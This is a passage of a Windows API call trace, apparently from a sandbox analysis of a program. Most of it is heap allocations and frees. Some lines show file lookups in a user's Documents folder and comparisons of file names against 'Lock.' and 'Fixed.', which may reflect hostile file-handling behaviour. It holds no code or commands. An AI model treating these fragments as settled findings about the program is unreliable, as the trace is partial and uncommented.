(in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0263.885] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0263.885] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0263.885] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0263.885] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0263.885] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0263.885] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0263.885] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24207f0 [0263.886] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0263.886] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0263.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0263.886] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0263.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0263.886] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0263.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0263.886] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0263.886] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0263.886] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0263.886] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0263.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0263.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0263.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0263.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0263.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0263.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0263.886] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0263.886] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0263.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0263.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0263.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0263.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x78) returned 0x24f5278 [0263.887] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/M4zK0AkB79QVLka.rtf", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\M4zK0AkB79QVLka.rtf", lpFilePart=0x8bf658*="M4zK0AkB79QVLka.rtf") returned 0x3b [0263.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f5278 | out: hHeap=0x25c0000) returned 1 [0263.887] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\M4zK0AkB79QVLka.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\m4zk0akb79qvlka.rtf")) returned 0xffffffff [0263.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0263.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0263.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0263.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0263.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0263.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0263.887] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0263.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0263.887] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0263.887] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0263.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0263.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0263.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0263.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0263.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0263.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0263.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0263.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0263.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0263.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0263.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0263.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0263.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0263.888] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MkMwkg_ip2 n-V.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0263.888] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kMwkg_ip2 n-V.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0263.888] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Mwkg_ip2 n-V.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0263.888] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wkg_ip2 n-V.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0263.888] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kg_ip2 n-V.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0263.888] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g_ip2 n-V.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0263.888] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_ip2 n-V.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0263.888] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ip2 n-V.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0263.888] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p2 n-V.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0263.888] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2 n-V.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0263.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" n-V.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0263.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n-V.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0263.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-V.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0263.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="V.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0263.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0263.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0263.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0263.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0263.889] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0263.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0263.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0263.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0263.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0263.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0263.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MkMwkg_ip2 n-V.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0263.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kMwkg_ip2 n-V.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0263.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Mwkg_ip2 n-V.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0263.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wkg_ip2 n-V.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0263.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kg_ip2 n-V.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0263.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g_ip2 n-V.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0263.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_ip2 n-V.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0263.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ip2 n-V.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0263.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p2 n-V.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0263.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2 n-V.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0263.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" n-V.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0263.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n-V.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0263.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-V.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0263.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="V.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0263.890] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0263.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0263.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0263.890] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0263.890] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0263.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0263.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0263.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9e10 [0263.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0263.890] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0263.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0263.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0263.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ea0 [0263.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0263.891] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0263.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0263.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0263.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0263.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0263.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0263.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0263.891] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0263.891] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0263.891] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0263.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0263.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0263.891] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0263.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0263.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0263.891] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0263.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0263.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0263.892] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0263.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0263.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0263.892] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/MkMwkg_ip2 n-V.docx", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x617772d0, ftCreationTime.dwHighDateTime=0x1d48989, ftLastAccessTime.dwLowDateTime=0x5d92c9d0, ftLastAccessTime.dwHighDateTime=0x1d4d691, ftLastWriteTime.dwLowDateTime=0x5d92c9d0, ftLastWriteTime.dwHighDateTime=0x1d4d691, nFileSizeHigh=0x0, nFileSizeLow=0x142e4, dwReserved0=0xa400047, dwReserved1=0x25e66, cFileName="MkMwkg_ip2 n-V.docx", cAlternateFileName="MKMWKG~1.DOC")) returned 0xaa5960 [0263.892] FindClose (in: hFindFile=0xaa5960 | out: hFindFile=0xaa5960) returned 1 [0263.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0263.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0263.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0263.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0263.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0263.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0263.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0263.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0263.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0263.893] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0263.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0263.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0263.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0263.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0263.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0263.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0263.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0263.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0263.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0263.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0263.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0263.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0263.894] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0263.894] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0263.894] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0263.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0263.894] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0263.894] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0263.894] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0263.894] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0263.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0263.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0263.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0263.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0263.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0263.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0263.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0263.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0263.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0263.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0263.894] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0263.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0263.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0263.895] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0263.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0263.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0263.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa878 [0263.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0263.895] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0263.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0263.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0263.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0263.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0263.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0263.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0263.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0263.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0263.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0263.895] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0263.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0263.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0263.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0263.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0263.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0263.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0263.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0263.896] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0263.896] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0263.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0263.896] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0263.896] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0263.896] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0263.896] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0263.896] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0263.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0263.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0263.896] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa0b0 [0263.896] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0263.896] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0263.896] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0263.896] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0263.897] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0263.897] 